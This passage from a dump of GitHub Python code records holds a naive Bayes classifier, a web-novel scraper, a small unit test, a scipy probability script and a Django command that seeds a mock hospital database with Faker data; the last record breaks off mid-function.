mean[i]), 2) / (2 * np.power(std_dev[i], 2)))\n            density = (1 / (np.sqrt(2 * np.pi) * std_dev[i])) * e\n            post.append(density)\n    return post\n\n\ndef nb(main_data, train_data, test_data, test_labels, strings):\n    prediction = []\n    rows = main_data.shape[0]\n    cols = main_data.shape[1]\n    class0 = []\n    class1 = []\n    for i in range(0,len(train_data)):\n        class1.append(train_data[i]) if train_data[i][cols-1] == 1 else class0.append(train_data[i])\n    class0 = np.array(class0)\n    class1 = np.array(class1)\n    c0row = class0.shape[0]\n    c1row = class1.shape[0]\n    trshape = train_data.shape[0]\n    means0 = []\n    means1 = []\n    if strings == []:\n        for i in range(0,main_data.shape[1]-1):\n            mean0 = np.mean(class0[:,i])\n            mean1 = np.mean(class1[:,i])\n            means0.append(mean0)\n            means1.append(mean1)\n    else:\n        for i in range(0, strings[0]):\n            mean0 = np.mean(class0[:, i])\n            mean1 = np.mean(class1[:, i])\n            means0.append(mean0)\n            means1.append(mean1)\n        means0.append(1)\n        means1.append(1)\n        for i in range(strings[0]+1, main_data.shape[1]-1):\n            mean0 = np.mean(class0[:, i])\n            mean1 = np.mean(class1[:, i])\n            means0.append(mean0)\n            means1.append(mean1)\n    #print(len(means0), len(means1))\n    std_dev0 = calc_std(main_data, class0, means0, strings)\n    std_dev1 = calc_std(main_data, class1, means1, strings)\n    #print(len(std_dev0), len(std_dev1))\n    cat_data = []\n    a = b = c = d = 0\n    if strings != []:\n        for j in strings:\n            for i in range(0,len(class0)):\n                if class0[i][j] not in cat_data:\n                    cat_data.append(class0[i][j])\n        for j in strings:\n            for i in range(0, len(class0)):\n                if class0[i,j] == cat_data[1]:\n                    a += 1\n                elif class0[i,j] == cat_data[0]:\n                    b += 1\n            string1_prob1 = a/(len(class0))\n            string2_prob1 = b/(len(class0))\n            for i in range(0, len(class1)):\n                if class1[i,j] == cat_data[1]:\n                    c += 1\n                elif class1[i,j] == cat_data[0]:\n                    d += 1\n            string1_prob2 = c/(len(class1))\n            string2_prob2 = d/(len(class1))\n    #print(string2_prob2)\n    test_label = []\n    ground_truth = []\n    pp0 = c0row/trshape\n    pp1 = c1row/trshape\n    for i in range(0, len(test_data)):\n        ground_truth.append(test_data[i][cols-1])\n        post_prob1 = post_prob(main_data, means0, std_dev0, test_data[i], strings)\n        post_prob2 = post_prob(main_data, means1, std_dev1, test_data[i], strings)\n        
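# Naive-Bayes conditional-independence step: each class likelihood below is\n        # the product of the per-feature Gaussian densities, P(x|c) = prod_i N(x_i; mu_i, sigma_i),\n        # which is then scaled by the class prior before the classes are compared.\n        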
post1 = np.prod(post_prob1, axis = None)\n        post2 = np.prod(post_prob2, axis = None)\n        if strings != []:\n            if test_data[i][strings[0]] == cat_data[1]:\n                class_post1 = post1 * pp0 * string1_prob1\n                class_post2 = post2 * pp1 * string1_prob2\n            elif test_data[i][strings[0]] == cat_data[0]:\n                class_post1 = post1 * pp0 * string2_prob1\n                class_post2 = post2 * pp1 * string2_prob2\n        else:\n            class_post1 = post1 * pp0\n            class_post2 = post2 * pp1\n        test_label.append(0) if class_post1 > class_post2 else test_label.append(1)\n    return metrics(ground_truth, test_label)\n\ndef metrics(ground_truth, prediction):\n    tp = 0\n    tn = 0\n    fp = 0\n    fn = 0\n    for i in range(len(ground_truth)):\n        if int(ground_truth[i]) == prediction[i] == 1:\n            tp += 1\n        if int(ground_truth[i]) == prediction[i] == 0:\n            tn += 1\n        if int(ground_truth[i]) != prediction[i]:\n            if int(ground_truth[i]) == 0:\n                fp += 1\n        if int(ground_truth[i]) != prediction[i]:\n            if int(ground_truth[i]) == 1:\n                fn += 1\n    accuracy, precision, recall, f1 = float(tn + tp)/len(ground_truth), float(tp)/float(tp + fp), float(tp)/float(tp + fn), (2*tp)/((2*tp)+fn+fp)\n    return accuracy, precision, recall, f1\n\ndef kfold(k, data, string_col):\n    rows = data.shape[0]\n    cols = data.shape[1]\n    totalAccuracy = 0\n    totalPrecision = 0\n    totalRecall = 0\n    totalF1 = 0\n    fold = math.ceil(data.shape[0]/10)\n    #print(fold)\n    for i in range(0, k):\n        test_data = data[i*fold:i*fold+fold,:]\n        train_data = np.delete(data, np.s_[i*fold:i*fold + fold],0)\n        test_labels = data[i*fold:i*fold+fold,-1]\n        accuracy, precision, recall, f1 = nb(data, train_data, test_data, test_labels, string_col)\n        totalAccuracy += accuracy\n        totalPrecision += precision\n        totalRecall += recall\n        totalF1 += f1\n    print(\"Accuracy after k fold validation: \" ,totalAccuracy*100/k)\n    print(\"Precision after k fold validation: \" ,totalPrecision*100/k)\n    print(\"Recall after k fold validation: \" ,totalRecall*100/k)\n    print(\"F measure after k fold validation: \" ,totalF1*100/k)\n\ndef main():\n    main_data = parse_data('../data/dataset2.txt')\n    string_col = []\n    for i in range(0,main_data.shape[1]):\n        try:\n            float(main_data[0][i])\n        except ValueError:\n            string_col.append(i)\n    #print(string_col)\n    kfold(10,main_data, string_col)\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"amitthere/classification-algorithms","sub_path":"code/nb.py","file_name":"nb.py","file_ext":"py","file_size_in_byte":6956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72118748888","text":"# This is a sample Python script.\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nimport json\nfrom utils import get_data_path, get_novels_path\nfrom novelparse import NovelParse\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom functools import reduce\nfrom multiprocessing import Pool\nimport numpy as np\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\nwebHead = 'http://www.87shuwu.info'\n\ndef get_novels():\n    # Use a breakpoint in the code line below to debug your script.\n    # print(f'Hi, {name}')  # Press ⌘F8 to toggle the breakpoint.\n    novels = [{'name': '大明天下', 'url': 'http://www.87shuwu.info/2/2643/'}]\n    for novel in novels:\n        print('Downloading novel %s, link: %s' % (novel['name'], novel['url']))\n        novel_html = requests.get(novel['url'])\n        tempPath = os.path.join(get_data_path(), 'temp.html')\n        with open(tempPath, 'w+') as file:\n            
file.write(novel_html.text)\n        soup = BeautifulSoup(novel_html.text, 'lxml')\n\ndef parsenovel(novel, dictJson):\n    print('Downloading novel %s, link: %s' % (novel['name'], novel['url']))\n    parser = NovelParse(webHead, novel, dictJson, 0)\n    parser.parsePage(novel['url'], True)\n    print('Novel %s download complete' % novel['name'])\n\ndef parse_novels1(novels):\n    dictPath = os.path.join(get_data_path(), 'dict.json')\n    dictJson = {}\n    try:\n        with open(dictPath, 'r') as file:\n            dictArray = json.load(file)\n            for item in dictArray:\n                dictJson[item[0]] = item[1]\n    except Exception as e:\n        print('Read dict json file error: ' + str(e))\n\n    for novel in novels:\n        parsenovel(novel, dictJson)\n\ndef parse_novels(novels):\n    pool = Pool(4)\n    # tempPath = os.path.join(get_data_path(), 'temp.html')\n    dictPath = os.path.join(get_data_path(), 'dict.json')\n    dictJson = {}\n    try:\n        with open(dictPath, 'r') as file:\n            dictArray = json.load(file)\n            for item in dictArray:\n                dictJson[item[0]] = item[1]\n    except Exception as e:\n        print('Read dict json file error: ' + str(e))\n    for novel in novels:\n        pool.apply_async(parsenovel, args=(novel, dictJson))\n    # with open(tempPath, 'r') as file:\n    #     context = file.read()\n    #     soup = BeautifulSoup(context, 'lxml')\n    #     charpertext = format('%s章节列表' % novel['name'])\n    #     heads = soup.find('h4', text=charpertext)\n    #     charpers = heads.parent.find_next_sibling('div')\n    #     chaperlist = charpers.find_all('a')\n    #     for item in chaperlist:\n    #         print('href: %s chaper name: %s' % (item.get('href'), item.text))\n    #     firstPage = soup.find('a', class_='indexPage')\n    #     endPage = soup.find('a', class_='endPage')\n    #     firstId = firstPage.get('href')[0: -1].split('_')\n    #     endId = endPage.get('href')[0: -1].split('_')\n    #     for i in range(int(firstId[1]), int(endId[1])):\n    #         href = format('%s_%s' % (firstId[0], i))\n    #         print(href)\n    #     print(heads)\n    pool.close()\n    pool.join()\n    print('Complete')\n\ndef parseFilterNovels(pageUrl):\n    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\n    page = requests.get(pageUrl, headers=headers)\n    soup = BeautifulSoup(page.text, 'lxml')\n    bd1 = soup.find('div', class_='bd')\n    items = bd1.find_all('div', class_='right')\n    novels = []\n    for item in items:\n        nameItem = item.find('a')\n        words = item.find('span', class_='words')\n        if int(words.text.split('：')[1]) > 200000 and '绿' not in nameItem.text:\n            novels.append({'name': nameItem.text, 'url': webHead + nameItem.get('href')})\n    print('Page %s: got %d novels' % (pageUrl, len(novels)))\n    return novels\n\ndef parseFilterNovelPages(baseUrl, prefix, name):\n    # baseUrl = 'http://www.87shuwu.info/shuku/7-lastupdate-0-1.html'\n    # Completed novels: http://www.87shuwu.info/shuku/0-lastupdate-2-1.html\n    # novelPath = os.path.join(get_data_path(), 'novels.html')\n    page = requests.get(baseUrl)\n    soup = BeautifulSoup(page.text, 'lxml')\n    endPage = soup.find('a', class_='endPage')\n    endHref = endPage.get('href')\n    endIndex = endHref.split('.')[0].split('-')\n    novels = []\n    threadPool = ThreadPoolExecutor(max_workers=16, thread_name_prefix='novel_filter')\n    tasks = [threadPool.submit(parseFilterNovels, (prefix + str(i) + '.html')) for i in range(1, int(endIndex[-1]) + 1)]\n    for future in as_completed(tasks):\n        novels.extend(future.result())\n    # for i in range(1, int(endIndex[-1]) + 1):\n    #     pageUrl = prefix + str(i) + '.html'\n    #     pageNovels = parseFilterNovels(pageUrl)\n    #     novels.extend(pageNovels)\n    #     if i % 10 == 0:\n    #         print('parse page: %d' % i)\n    # novelPath = os.path.join(get_data_path(), name + '.json')\n    # 
with open(novelPath, 'w') as file:\n    #     file.write(json.dumps(novels))\n    novelPath = os.path.join(get_data_path(), name + '.json')\n    with open(novelPath, 'w') as file:\n        file.write(json.dumps(novels))\n    # firstPage = BeautifulSoup(requests.get(baseUrl).text, 'lxml')\n\ndef mergeNovelsName():\n    names = []\n    # with open(os.path.join(get_data_path(), '小说.json'), 'r') as file:\n    #     names.extend(json.load(file))\n    # names = list(filter(lambda x: '玄幻灵异' not in x['name'] and '古代架空' not in x['name'] and '网游竞技' not in x['name'], names))\n    # with open(os.path.join(get_data_path(), '小说.json'), 'w') as file:\n    #     file.write(json.dumps(names))\n\n    for filename in ['完本小说.json', '连载小说.json']:\n        filepath = os.path.join(get_data_path(), filename)\n        with open(filepath, 'r') as file:\n            names.extend(json.load(file))\n    def nameCheck(name):\n        removeContext = ['CP', 'BL', 'NTR', '玄幻灵异', '绿', '古代架空', '网游竞技', '妻', '穿越重生', '近代现代', '无限流派', '古代架空']\n        for item in removeContext:\n            if item in name:\n                return False\n        return True\n    names = list(filter(lambda x: nameCheck(x['name']), names))\n    s = set()\n    newNames = []\n    for name in names:\n        if name['name'] in s:\n            continue\n        else:\n            newNames.append(name)\n            s.add(name['name'])\n    with open(os.path.join(get_data_path(), '小说.json'), 'w') as file:\n        file.write(json.dumps(newNames))\n\ndef mergeNovels():\n    list_dirs = os.walk(get_data_path())\n    novelsPath = get_novels_path()\n    for root, dirs, _ in list_dirs:\n        for d in dirs:\n            if 'img' in d:\n                continue\n            sub_dirs = os.walk(os.path.join(root, d))\n            charpers = []\n            for sub_root, _, files in sub_dirs:\n                for file in files:\n                    file_path = os.path.join(root, d, file)\n                    index = file.split('.')[-2].split('_')[-1]\n                    with open(file_path, 'r') as f:\n                        charpers.append({'context': f.read(), 'index': int(index)})\n            charpers.sort(key=lambda x: x['index'])\n            result = reduce(lambda pre, item: pre + item['context'], charpers, '')\n            save_path = os.path.join(novelsPath, d + '.txt')\n            with open(save_path, 'w') as file:\n                file.write(result)\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n    # mergeNovelsName()\n    # mergeNovels()\n    # parseFilterNovelPages('http://www.87shuwu.info/shuku/7-lastupdate-0-1.html', 'http://www.87shuwu.info/shuku/7-lastupdate-0-', '连载小说')\n    # parseFilterNovelPages('http://www.87shuwu.info/shuku/0-lastupdate-2-1.html',\n    #                       'http://www.87shuwu.info/shuku/0-lastupdate-2-', '完本小说')\n    novels = []\n    with open(os.path.join(get_data_path(), '小说.json'), 'r') as file:\n        novels = json.load(file)\n    novelBase = get_novels_path()\n    for _, _, files in os.walk(novelBase):\n        names = []\n        for file in files:\n            names.append(file.split('.')[0])\n    print('before: %d' % len(novels))\n    novels = list(\n        filter(lambda x: x['name'] not in names, novels))\n    print('after: %d' % len(novels))\n    # dictPath = os.path.join(get_data_path(), 'dict.json')\n    # try:\n    #     with open(dictPath, 'r') as file:\n    #         dictJson = json.load(file)\n    #         file.close()\n    #     dictJson = sorted(dictJson.items(), key=lambda x: x[0])\n    #     with open(dictPath, 'w') as file:\n    #         file.write(json.dumps(dictJson))\n    # except Exception as e:\n    #     print('Read dict json file error: ' + str(e))\n    parse_novels(novels)\n    # parse_novels1(novels)\n    # get_novels()\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"lhyfcs/novel_reptile","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 
+{"seq_id":"1906441421","text":"#!/usr/bin/env python\nimport unittest\nfrom manager_api import *\n\nclass Test_meeting(unittest.TestCase):\n\tdef test_db_control(self):\n\t\tadd = Add_meeting(title='ddhg',content='b',leader='c',meeting_time='d')\n\t\tupdate = Update_meeting(1,'title','x')\n\t\tdel_meeitng = Del_meeting(1)\n\t\tsearchall = Search_meetings()\n\t\tself.assertEquals(add,True)\n\t\tself.assertEquals(update,True)\n\t\tself.assertEquals(del_meeting,True)\n\t\tself.assertTrue(isinstance(searchall,dict))\n\tdef testerror(self):\n\t\twith self.assertRaises(TypeError):\n\t\t\tAdd_meeting('abd','e','f','g')\n\t\tAdd_meeting(title='ddhg',content='b',leader='c',meeting_time='d')\n\t\twith self.assertRaises(sqlalchemy.exc.IntegrityError):\n\t\t\tAdd_meeting(title='ddh',content='c',leader='d',meeting_time='f')\n\t\twith self.assertRaises(sqlalchemy.exc.InvalidRequestError):\n\t\t\tUpdate_meeting(99,'title','x')\n\t\twith self.assertRaises(orm_exc.NoResultFound):\n\t\t\tLook_patteners('x')\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"xingmin860818/myobject-master","sub_path":"meeting_v2/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4155224845","text":"import numpy as np\nfrom scipy.stats import rv_discrete\n\nnum_of_balls_returned = np.array([0, 0, 1, 0, 0, 30, 20, 7, 6, 26, 54, 14, 22, 11, 6, 5, 38, 25, 15, 9, 16])\nnum_of_balls_thrown = np.array([20, 30, 20, 55, 57, 36, 25, 17, 16, 29, 55, 17, 25, 22, 36, 25, 98, 45, 25, 15, 25])\nprint(num_of_balls_returned / num_of_balls_thrown)\ntemp = 1 - (num_of_balls_returned / (num_of_balls_thrown+1))\n\n\nr_spin = rv_discrete(name='r_spin', values=([-2, -1, 0, 1, 2], temp[:5]/np.sum(temp[:5])))\nprint(temp[:5]/np.sum(temp[:5]))\nr_freq = rv_discrete(name='r_freq', values=([0, 1, 2], temp[5:8]/np.sum(temp[5:8])))\nprint( temp[5:8]/np.sum(temp[5:8]))\nr_speed = rv_discrete(name='r_speed', values=([1, 2, 3], temp[8:11]/np.sum(temp[8:11])))\nprint(temp[8:11]/np.sum(temp[8:11]))\nr_dir = rv_discrete(name='r_dir', values=([-2, -1, 0, 1, 2], temp[11:16]/np.sum(temp[11:16])))\nprint(temp[11:16]/np.sum(temp[11:16]))\nr_lau_ang = rv_discrete(name='r_lau_ang', values=([-2, -1, 0, 1, 2], temp[16:21]/np.sum(temp[16:21])))\nprint(temp[16:21]/np.sum(temp[16:21]))\n","repo_name":"kkaya674/AntiaTech","sub_path":"Control Algoritm/deneme_dosyasi.py","file_name":"deneme_dosyasi.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39770827528","text":"import os\nimport shutil\nimport random\nfrom datetime import datetime\n\nfrom django.core.management.base import BaseCommand\nfrom django.core.management import call_command\nfrom faker import Faker\nfrom faker_biology.physiology import Organ\nfrom faker_biology.taxonomy import ModelOrganism\nfrom faker_biology.mol_biol import Enzyme\nfrom faker_biology.bioseq import Bioseq\n\nfrom hospital.models.actions import Consultation, Perscriptions, Surgery\nfrom hospital.models.places import Unit, Bed, Room\nfrom hospital.models.people import (\n Person,\n Nurse,\n Patient,\n Physician,\n Surgeon,\n get_chief_of_staff,\n)\nfrom hospital.models.illnesses import Medication, Illness, Allergy, Interactions\nfrom hospital.models.skill_types import Skills, AssignedSkills, SurgeryType\nfrom hospital import constants\n\nfrom dbmgmt.settings import BASE_DIR\n\nfake = 
\nTOTAL_ROOMS = 25\nTOTAL_PATIENTS = 100\nTOTAL_PHYSICIANS = 15\nTOTAL_SURGEONS = 15\nTOTAL_NURSES = 12\n\nclass Command(BaseCommand):\n    help = 'Deletes current and recreates the mock database'\n\n    def reset_db(self):\n        # Verify migrations are made and db gets them\n        try:\n            os.remove(f\"{BASE_DIR}/db.sqlite3\")\n        except FileNotFoundError:\n            pass\n        shutil.rmtree(f\"{BASE_DIR}/hospital/migrations\", ignore_errors=True)\n        call_command(\"makemigrations\", \"hospital\")\n        call_command(\"makemigrations\")\n        call_command(\"migrate\", \"hospital\")\n        call_command(\"migrate\")\n\n    def populate_constants(self):\n        \"\"\" Populate constants into their own tables \"\"\"\n\n        # Creating entire skills table\n        for skill, _ in constants._SURGICAL_SKILLS:\n            s = Skills(name=skill)\n            s.save()\n            print(\"Created skill of\", s)\n\n        # Surgery types made of skills\n        def create_type(name, skills: list):\n            stype = SurgeryType(name=name)\n            stype.save()\n            for skill in skills:\n                stype.requirements.add(Skills.objects.get(name=skill))\n            stype.save()\n            print(f\"Created SurgeryType of {stype}\")\n\n        create_type(\"general_surgery\", [\"transplant\", \"wound\"])\n        create_type(\"neurosurgery\", [\"brain\", \"head_trauma\"])\n        create_type(\"cardiac_surgery\", [\"cardiac_arrest\", \"heart_valve\"])\n        create_type(\"plastic_surgery\", [\"rhinoplasty\", \"facelift\"])\n\n        # Create all beds and such\n        for code, name in constants._UNITS:\n            u = Unit(name=name, prefix=code)\n            u.save()\n\n            # Give every unit TOTAL_ROOMS rooms\n            for i in range(1, TOTAL_ROOMS + 1):\n                r = Room(number=i, unit=u)\n                r.save()\n\n                Bed(room=r, bed_letter=\"A\").save()\n                Bed(room=r, bed_letter=\"B\").save()\n                # Give even-numbered rooms 3 beds, odd rooms 2\n                if i%2==0:\n                    Bed(room=r, bed_letter=\"C\").save()\n\n    def create_neurosurgeon(self):\n        \"\"\" Creates a neurosurgeon and makes sure he can perform \"\"\"\n        # Create neuro\n        neurosurgeon = Surgeon(\n            first_name=\"Joan\",\n            last_name=\"Neuro\",\n            dob=datetime(1970, 2, 2),\n            gender=\"F\",\n            address=\"10 Brain Lane\",\n            phone=\"1298763490\",\n            contract_length=5,\n            contract_type=\"Per Surgery\",\n            ssn=fake.ssn()\n        )\n        neurosurgeon.save()\n\n        # Give neurosurgeon the right skills\n        neuro_skills = [\"brain\", \"head_trauma\"]\n        for skill in neuro_skills:\n            # User will be presented these in view\n            skill_instance = Skills.objects.get(name=skill)\n\n            # Add skill to surgeon\n            AssignedSkills(person=neurosurgeon, skill=skill_instance).save()\n\n        # Should be good here\n        neurosurgery = SurgeryType.objects.get(name=\"neurosurgery\")\n        if neurosurgeon.can_perform(neurosurgery):\n            print(\"Created Neurosurgeon that can perform Neurosurgery\")\n        else:\n            raise RuntimeError(\"Hmm.. 
Check into can_perform method..\")\n\n        return neurosurgeon\n\n    def create_plastic_surgeon(self):\n        \"\"\" Creates a plastic surgeon and makes sure he can perform \"\"\"\n        # Create surgeon\n        plastic_surgeon = Surgeon(\n            first_name=\"P.\",\n            last_name=\"Lastic\",\n            dob=datetime(1965, 3, 3),\n            gender=\"M\",\n            address=\"10 Botox Ave\",\n            phone=\"8760981234\",\n            contract_length=3,\n            contract_type=\"Per Surgery\",\n            ssn=fake.ssn()\n        )\n        plastic_surgeon.save()\n\n        # Give the plastic surgeon the right skills\n        plastic_skills = [\"rhinoplasty\", \"facelift\"]\n        for skill in plastic_skills:\n            # User will be presented these in view\n            skill_instance = Skills.objects.get(name=skill)\n\n            # Add skill to surgeon\n            AssignedSkills(person=plastic_surgeon, skill=skill_instance).save()\n\n        # Double-check he can do what's expected\n        plastic = SurgeryType.objects.get(name=\"plastic_surgery\")\n        neuro = SurgeryType.objects.get(name=\"neurosurgery\")\n        if plastic_surgeon.can_perform(plastic):\n            print(\"Created Plastic Surgeon that can perform Plastic Surgery\")\n        else:\n            raise RuntimeError(\"Hmm.. Check into can_perform method..\")\n\n        # Verify he can't do neuro\n        if plastic_surgeon.can_perform(neuro):\n            raise RuntimeError(\"Nope, plastic surgeon shouldn't be able to do Neurosurgery\")\n\n        return plastic_surgeon\n\n    def create_plastic_nurse(self):\n        \"\"\" Creates a plastic nurse\"\"\"\n        # Create nurse\n        nurse = Nurse(\n            first_name=\"Ken\",\n            last_name=\"Plasty\",\n            dob=datetime(1965, 3, 3),\n            gender=\"M\",\n            address=\"10 Botox Ave\",\n            phone=\"8760981234\",\n            salary=120_000,\n            ssn=fake.ssn(),\n            grade=\"a\",\n            years_of_experience=5,\n        )\n        nurse.save()\n\n        # Give nurse plastic surgery skill\n        skill_instance = Skills.objects.get(name=\"facelift\")\n\n        # Add skill to Nurse\n        AssignedSkills(person=nurse, skill=skill_instance).save()\n\n        # Double-check he can do what's expected\n        plastic = SurgeryType.objects.get(name=\"plastic_surgery\")\n        neuro = SurgeryType.objects.get(name=\"neurosurgery\")\n        if nurse.can_perform(plastic):\n            print(\"Created Plastic Surgery Nurse to assist\")\n        else:\n            raise RuntimeError(\"Hmm.. 
Check into can_perform method..\")\n\n        # Verify he can't do neuro\n        if nurse.can_perform(neuro):\n            raise RuntimeError(\"Nope, plastic Nurse shouldn't be able to assist in Neurosurgery\")\n\n        return nurse\n\n    def create_general_physician(self):\n        phys = Physician(\n            specialty=\"general\",\n            salary=150_000,\n            first_name=\"Al\",\n            last_name=\"Gener\",\n            dob=datetime(1940, 5, 5),\n            gender=\"M\",\n            address=\"123 General Way\",\n            phone=fake.phone_number(),\n            ssn=fake.ssn(),\n        )\n        phys.save()\n        print(f\"Created Physician of '{phys}'\")\n        return phys\n\n    def create_optomotrist(self):\n        phys = Physician(\n            specialty=\"optometry\",\n            salary=180_000,\n            first_name=\"Cornealeus\",\n            last_name=\"John\",\n            dob=datetime(1945, 5, 5),\n            gender=\"M\",\n            address=\"123 Eye Ct\",\n            phone=fake.phone_number(),\n            ssn=fake.ssn(),\n        )\n        phys.save()\n        print(f\"Created Optometrist of '{phys}'\")\n        return phys\n\n    def create_general_patient(self):\n        patient = Patient(\n            first_name=\"Pat\",\n            last_name=\"Entman\",\n            dob=datetime(1980, 5, 5),\n            gender=\"M\",\n            address=\"123 Patient Dr\",\n            phone=fake.phone_number(),\n            ssn=fake.ssn(),\n            blood_type=\"op\",\n            blood_sugar=\"12\",\n            cholesterol_hdl=\"6\",\n            cholesterol_ldl=\"5\",\n            cholesterol_tri=\"8\",\n        )\n        patient.save()\n        print(f\"Created Patient of '{patient}'\")\n        return patient\n\n    def create_medication1(self):\n        medication1 = Medication(\n            name = \"Tylenol\",\n            code = 1001,\n            available_qnty = 35,\n            cost = 4.5,\n            usage = \"\"\" Acetaminophen is used to relieve mild to moderate pain from headaches,\n                muscle aches, menstrual periods, colds and sore throats, toothaches,\n                and to reduce fever.\"\"\"\n        )\n        medication1.save()\n        print(f\"Created Medication of '{medication1}'\")\n        return medication1\n\n    def create_medication2(self):\n        medication2 = Medication(\n            name = \"Advil\",\n            code = 1002,\n            available_qnty = 46,\n            cost = 6.25,\n            usage = \"\"\" Ibuprofen is used to relieve pain from various conditions such as headache,\n                dental pain, menstrual cramps, muscle aches, or arthritis. 
It is also used to reduce fever\n                and to relieve minor aches and pain due to the common cold or flu.\"\"\"\n        )\n        medication2.save()\n\n        for _ in range(15):\n            m = Medication(\n                name=fake.amino_acid().full_name,\n                code=random.randint(1000, 2000),\n                available_qnty=random.randint(1,100),\n                cost=float(random.randint(0,10)),\n                usage=fake.paragraph(nb_sentences=5)\n            )\n            m.save()\n        print(f\"Created Medication of '{medication2}'\")\n        return medication2\n    \n    def create_medication_interaction(self):\n        for _ in range(20):\n            med1 = Medication.objects.order_by('?').first()\n            med2 = Medication.objects.order_by('?').first()\n            if (med1.pk != med2.pk):\n                try:\n                    i = Interactions(medication1= med1, medication2 = med2, severity = 'm')\n                    i.save()\n                except Exception:\n                    pass\n\n\n    def create_many_nurses(self):\n        \"\"\" Each nurse needs at least 5 patients \"\"\"\n        for i in range(TOTAL_NURSES):\n            first = fake.first_name()\n            n = Nurse(\n                first_name=first,\n                last_name=fake.last_name(),\n                dob=fake.date(),\n                gender=\"M\" if 'e' in first else \"F\",\n                address=fake.address(),\n                phone=fake.phone_number(),\n                ssn=fake.ssn(),\n                grade=constants.NURSE_GRADES[random.randint(0, len(constants.NURSE_GRADES) - 1)][0],\n                years_of_experience=random.randint(1,15),\n                salary=random.randint(60_000, 180_000)\n            )\n            n.save()\n\n    def create_many_patients(self):\n        \"\"\" Create a bunch of patients \"\"\"\n        for i in range(TOTAL_PATIENTS):\n            first = fake.first_name()\n            p = Patient(\n                first_name=first,\n                last_name=fake.last_name(),\n                dob=fake.date(),\n                gender=\"M\" if 'a' in first else \"F\",\n                address=fake.address(),\n                phone=fake.phone_number(),\n                ssn=fake.ssn(),\n                blood_type=\"an\",\n                blood_sugar=1.0,\n                cholesterol_hdl=2.0,\n                cholesterol_ldl=3.0,\n                cholesterol_tri=4.0,\n            )\n            p.save()\n            # Randomly admit some\n            if random.randint(0, 1):\n                p.bed = Bed.objects.filter(patient__isnull=True).order_by(\"?\").first()\n                p.assigned_nurse = Nurse.objects.order_by(\"?\").first()\n                p.save()\n\n            # Randomly give some illnesses\n            if random.randint(0, 1):\n                name = fake.enzyme()\n                illness = Illness(\n                    name=name,\n                    illness_code=\"\".join([word[0] for word in name.split(\" \")]),\n                    description=fake.paragraph(nb_sentences=5)\n                )\n                illness.save()\n                p.illnesses.add(illness)\n                p.save()\n\n            # Randomly give some allergies\n            if random.randint(0, 1):\n                name = fake.enzyme()\n                allergy = Allergy(\n                    name=name,\n                    allergy_code=\"\".join([word[0] for word in name.split(\" \")]),\n                    description=fake.paragraph(nb_sentences=5)\n                )\n                allergy.save()\n                p.allergies.add(allergy)\n\n            p.save()\n            per = Perscriptions(\n                physician=Physician.objects.order_by(\"?\").first(),\n                patient=p,\n                medication=Medication.objects.order_by(\"?\").first(),\n                frequency=f\"Take {random.randint(1,3)} daily\",\n                dosage=f\"{random.randint(100, 500)} mg\"\n            )\n            per.save()\n\n            if random.randint(0, 1):\n                stype = SurgeryType.objects.order_by(\"?\").first()\n                eligible_nurses = [n for n in Nurse.objects.all() if n.can_perform(stype)]\n                eligible_surgeons = [s for s in Surgeon.objects.all() if s.can_perform(stype)]\n                if eligible_nurses and eligible_surgeons:\n                    sur = Surgery(\n                        date=fake.date(),\n                        surgeon=eligible_surgeons[0],\n                        nurse=eligible_nurses[0],\n                        patient=p,\n                        code=\"neu\",\n                        anatomical_location=\"Head\",\n                        category=\"h\",\n                        type=stype,\n                        special_needs=\"None\"\n                    )\n                    sur.save()\n\n        print(f\"Created {TOTAL_PATIENTS} mock patients\")\n\n    def create_many_physicians(self):\n        for _ in range(TOTAL_PHYSICIANS):\n            first = fake.first_name()\n            p = Physician(\n                first_name=first,\n                last_name=fake.last_name(),\n                dob=fake.date(),\n                gender=\"M\" if 'c' 
in first else \"F\",\n address=fake.address(),\n phone=fake.phone_number(),\n ssn=fake.ssn(),\n specialty=constants.SPECIALTIES[random.randint(0, len(constants.SPECIALTIES)-1)][0],\n salary=random.randint(40_000, 180_000)\n )\n p.save()\n\n def create_many_surgeons(self):\n for _ in range(TOTAL_SURGEONS):\n first = fake.first_name()\n s = Surgeon(\n first_name=first,\n last_name=fake.last_name(),\n dob=fake.date(),\n gender=\"M\" if 'c' in first else \"F\",\n address=fake.address(),\n phone=fake.phone_number(),\n ssn=fake.ssn(),\n specialty=constants.SPECIALTIES[random.randint(0, len(constants.SPECIALTIES)-1)][0],\n contract_length=random.randint(1, 10),\n contract_type=\"Type\"+str(random.randint(1, 5))\n )\n s.save()\n\n # def add_staff_to_patient(self):\n # for _ in range(5):\n # p = Physician.objects.order_by('?').first()\n # person = Person.get(pk = p.emp_number) #objects. filter( pk = p.emp_number ).\n # patient = Patient( person_ptr = person.emp_number, \n # blood_type= \"op\",\n # blood_sugar = 4,\n # cholesterol_hdl = 5,\n # cholesterol_ldl = 6,\n # cholesterol_tri = 7 )\n # patient.save_base( raw = True )\n\n def handle(self, *args, **options):\n \"\"\" Call the command \"\"\"\n\n self.reset_db()\n\n # Start creating mock data and relations\n print(\"Mocking up the database...\")\n\n # Create skills, types, etc\n self.populate_constants()\n\n # Create our Chief of Staff (Also a Physician)\n chief = get_chief_of_staff()\n print(f\"Created our Chief of Staff '{chief.first_name} {chief.last_name}'\")\n\n # Create a neurosurgeon\n neurosurgeon = self.create_neurosurgeon()\n\n # Create plastic surgeon\n plastic_surgeon = self.create_plastic_surgeon()\n\n # Create a plastic surgery nurse\n plastic_nurse = self.create_plastic_nurse()\n\n # Create a physicians\n general_physician = 